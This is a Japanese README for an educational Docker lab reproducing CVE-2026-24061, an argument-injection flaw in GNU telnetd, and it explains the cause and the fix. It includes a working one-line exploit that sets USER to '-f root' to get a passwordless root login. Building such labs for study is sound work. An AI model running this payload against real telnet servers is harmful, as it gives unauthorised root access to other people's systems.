このリポジトリには、CVE-2026-24061 の脆弱性を実証するためのシンプルな Docker ラボが含まれています。 この脆弱性により、Linux 上の GNU telnetd で認証バイパスと root アクセスが可能になります。
目的は教育専用です。
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
別のターミナルで、以下を実行します:
USER="-f root" telnet -a localhost 2323
これにより、パスワードの要求なしで root として直接アクセスが許可されます。
この欠陥は、/usr/bin/login ユーティリティの呼び出し中に発生する引数インジェクションによるものです。telnetd は login を呼び出すために使用されるコマンドラインを動的に構築し、プレースホルダ %U を介して環境変数 USER の値をサニタイズなしで含めます。
login ユーティリティはパスワード認証を無視する -f オプションを受け入れるため、攻撃者は USER="-f root" を設定して root としての直接ログインを強制できます。
telnetd は昇格された権限で実行されるため、この操作により有効な認証情報なしで即座に root シェルが得られます。エクスプロイトは単純で、事前の操作を必要とせず、簡単に自動化できるため、CVSS スコア 9.8 が正当化されます。
この脆弱性は、USER 変数の検証とサニタイズの導入により修正され、ハイフンで始まる値と特殊文字をブロックして、login への引数インジェクションを防止しています。